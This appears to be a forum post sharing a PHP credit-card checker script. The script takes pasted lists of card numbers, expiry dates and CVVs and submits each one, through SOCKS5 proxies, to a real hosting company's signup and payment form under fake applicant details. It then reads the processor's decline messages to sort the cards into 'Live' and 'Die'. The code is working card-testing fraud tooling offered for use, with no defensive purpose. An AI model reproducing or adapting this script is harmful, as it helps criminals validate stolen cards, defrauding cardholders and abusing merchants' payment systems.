A25414N
Professional
- Messages
- 243
- Reaction score
- 20
- Points
- 18
Code:
<?
session_start();
ob_start();
?>
<html>
<center>
<p><br><br><Br><em>Alow : Visa, Master Card, American Express, Discover<br>
<form action="" method="post" style="padding:0 10px;" id="form">
<textarea name="ccnlist" id="ccnlist" style="width:800px;height:300px;"><? echo $RSC;?></textarea>
<textarea name="socklist" style="width:200px;height:300px;"></textarea>
<p><input type="submit" style="height:40px;width:120px; margin:5px 0; padding:5px 2px;" value="Check Now !!!" /></p>
<div class="bg"></div>
</form>
</center>
<?
$socklist=$_POST***91;'socklist'***93;;
$BanQuyen ="";
if($_POST***91;'ccnlist'***93;)
{
$cclist = removedupe($_POST***91;'ccnlist'***93;);
flush();
$RSC = "";
if($cclist) foreach ($cclist as $ccline)
{
$RSC .= $ccline."\n";
flush();
}
}
if($cclist)
{
?>
<center><p>Start Checking With : <?=count($cclist)?> Credit Card(s)</p></center>
<p align="left">
<?
//$Cookie = "Cookie123.txt"; // Linux
$Cookie = "Cookie123.txt"; // VPS WIN
for($i=0;$i<count($cclist);$i++)
{
$r = $r + 1;
if ($r<=5)
{
$cc = info($cclist***91;$i***93;);
if($cc)
{
$id = Random(14);
$Results = check_cvv($cc ***91;'num'***93;,$cc ***91;'cvv'***93;,$cc ***91;'mon'***93;,$cc ***91;'year'***93;,$cc ***91;'type'***93;,$socklist);
Clear($Cookie);
flush();
if($Results==1)
{
echo "<font color=\"green\"><b>Live</b></font> => | ".$cclist***91;$i***93;;
flush();
$cclive***91;***93; = $cclist***91;$i***93;;
}
else
{
echo "<font color=\"red\"><b>Die</b></font> => | ".$cclist***91;$i***93;;
flush();
$ccdie***91;***93; = $cclist***91;$i***93;;
}
}
else
{
echo "<font color=\"red\"><b>CC Error</b></font> => | ".$cclist***91;$i***93;;
flush();
$ccerror***91;***93; = $cclist***91;$i***93;;
}
echo "<br/>";
flush();
}
}
?>
</p><div class="bg"></div>
<?
if(!is_null($cclive))
{
?>
<center><p><font color="green"><b>LIVE - <?=count($cclive)?></b></font><br />
<textarea style="width:700px; border:1px solid #e8e8e8; margin:10px 0; padding:2px; height:150px;"><? foreach ($cclive as $ss) echo $ss."| ".$BanQuyen."\n";?></textarea></p></center>
<?
}
if(!is_null($ccdie))
{
?>
<center><p><font color="red"><b>DIE - <?=count($ccdie)?></b></font><br />
<textarea style="width:700px; border:1px solid #e8e8e8; margin:10px 0; padding:2px; height:150px;"><? foreach ($ccdie as $ss) echo $ss."| ".$BanQuyen."\n";?></textarea></p></center>
<?
}
if(!is_null($provinder))
{
?>
<center><p><font color="red"><b>Can't check - <?=count($provinder)?></b></font><br />
<textarea style="width:700px; border:1px solid #e8e8e8; margin:10px 0; padding:2px; height:150px;"><? foreach ($provinder as $ss) echo $ss."| ".$BanQuyen."\n";?></textarea></p></center>
<?
}
if(!is_null($ccinvalid))
{
?>
<center><p><font color="Red"><b>INVALID - <?=count($ccinvalid)?></b></font><br />
<textarea style="width:700px; border:1px solid #e8e8e8; margin:10px 0; padding:2px; height:150px;"><? foreach ($ccinvalid as $ss) echo $ss."| ".$BanQuyen."\n";?></textarea></p></center>
<?
}
}
function Random($x)
{
$Strings = "abcdefghijklmnopqrstuvwxyz";
$Str = "";
while(strlen($Str) < $x)
{
$Rand = Rand(0,strlen($Strings));
$Str .= substr($Strings,$Rand,1);
}
return $Str;
}
Function Clear($cookie)
{
$fp = fopen ($cookie, "w");
fwrite ($fp, "");
fclose ($fp);
}
function check_cvv($num,$cvv,$exm,$exy,$type,$sock){
$url="https://www.gotfusion.com/signup/process.cfm";
$data=array(
FormUserLevel => "58000",
nickname => "sdasdasda".rand(1,10000),
password => "concon11",
passwordconfirm => "concon11",
hosting_type => "Windows",
domainName => "http://www.com.com",
CompanyName => "Windows",
firstname => "sss",
lastname => "sss",
address1 => "3020 Renwick Avenue",
city => "Elk Grove",
state => "CA",
zip => "95758",
country => "United States",
phone => "5800058000",
email => "godzrap@gmail.com",
emailconfirm => "godzrap@gmail.com",
cc_type => "$type",
cc_number => "$num",
exp_mo => "$exm",
exp_year => "$exy",
cvv2 => "$cvv",
submit => "Process+Account",
);
$ch=curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
if($sock)
{
curl_setopt($ch, CURLOPT_PROXY, $sock);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
$xxx=curl_exec($ch);
curl_close($ch);
if(stristr($xxx, "The transaction has been declined because of an AVS mismatch"))
return 1;
elseif(stristr($xxx, "This transaction has been declined"))
return 5;
elseif(stristr($xxx, "A duplicate transaction has been submitted"))
return 9;
else
return -1;
}
Function Getbetween($content,$start,$end){
$r = explode($start, $content);
if (isset($r***91;1***93;))
{
$r = explode($end, $r***91;1***93;);
if ($r***91;0***93; == '') return 'Unknown';
return $r***91;0***93;;
}
}
function info($ccline)
{
$xy = array("|","\\","/","-",";");
$sepe = $xy***91;0***93;;
foreach($xy as $v)
{
if (substr_count($ccline,$sepe) < substr_count($ccline,$v)) $sepe = $v;
}
$x = explode($sepe,$ccline);
foreach($xy as $y) $x = str_replace($y,"",str_replace(" ","",$x));
foreach ($x as $xx)
{
$xx = trim($xx);
if (is_numeric($xx))
{
$yy=strlen($xx);
switch ($yy)
{
case 15:
if (substr($xx,0,1)==3)
{
$ccnum***91;'num'***93; = $xx;
$ccnum***91;'type'***93; = "American+Express";
}
break;
case 16:
switch (substr($xx,0,1))
{
case '4':
$ccnum***91;'num'***93;=$xx;
$ccnum***91;'type'***93; = "Visa";
break;
case '5':
$ccnum***91;'num'***93;=$xx;
$ccnum***91;'type'***93; = "MasterCard";
break;
case '6':
$ccnum***91;'num'***93;=$xx;
$ccnum***91;'type'***93; = "Discover";
break;
}
break;
case 1:
if (($xx >= 1) and ($xx <=12) and (!isset($ccnum***91;'mon'***93;))) $ccnum***91;'mon'***93; = "0".$xx;
case 2:
if (($xx >= 1) and ($xx <=12) and (!isset($ccnum***91;'mon'***93;))) $ccnum***91;'mon'***93; = $xx;
elseif (($xx >= 9) and ($xx <= 19) and (isset($ccnum***91;'mon'***93;)) and (!isset($ccnum***91;'year'***93;))) $ccnum***91;'year'***93; = "20".$xx;
break;
case 4:
if (($xx >= 2011) and ($xx <= 2022) and (isset($ccnum***91;'mon'***93;))) $ccnum***91;'year'***93; = $xx;
elseif ((substr($xx,0,2) >= 1) and (substr($xx,0,2) <=12) and (substr($xx,2,2)>= 9) and (substr($xx,2,2) <= 19) and (!isset($ccnum***91;'mon'***93;)) and (!isset($ccnum***91;'year'***93;))){
$ccnum***91;'mon'***93; = substr($xx,0,2);
$ccnum***91;'year'***93; = "20".substr($xx,2,2);
}
else $ccv***91;'cv4'***93; = $xx;
break;
case 6:
if ((substr($xx,0,2) >= 1) and (substr($xx,0,2) <=12) and (substr($xx,2,4)>= 2011) and (substr($xx,2,4) <= 2022)){
$ccnum***91;'mon'***93; = substr($xx,0,2);
$ccnum***91;'year'***93; = substr($xx,2,4);
}
break;
case 3:
$ccv***91;'cv3'***93; = $xx;
break;
}
}
}
if (isset($ccnum***91;'num'***93;) and isset($ccnum***91;'mon'***93;) and isset($ccnum***91;'year'***93;)){
if ($ccnum***91;'type'***93; == "American+Express") $ccnum***91;'cvv'***93; = $ccv***91;'cv4'***93;;
else $ccnum***91;'cvv'***93; = $ccv***91;'cv3'***93;;
return $ccnum;
}
else return false;
}
function removedupe($cclist)
{
$cclist = explode("\n",$cclist);
$data = "";
foreach($cclist as $ccline)
{
$cc = info($ccline);
$data.= $ccline."\r\n\r\n";
$CcNum = str_replace(array(" ", "-"),"", $cc***91;'num'***93;);
if(strlen($CcNum)=="16" || strlen($CcNum)=="15")
{
if($CheckMP***91;$CcNum***93; != true)
{
$CheckMP***91;$CcNum***93; = true;
$New***91;***93; = $ccline;
}
}
}
return $New;
}
function inStr($s,$as)
{
$s = strtoupper($s);
if(!is_array($as)) $as=array($as);
for($i=0;$i<count($as);$i++) if(strpos(($s),strtoupper($as***91;$i***93;))!==false) return true;
return false;
}
if(strlen($RSC)<1) $RSC = "";
if(!isset($PG)) $PG = 10000;
if (!isset($bl)) $bl = 10;
ob_end_flush();
?>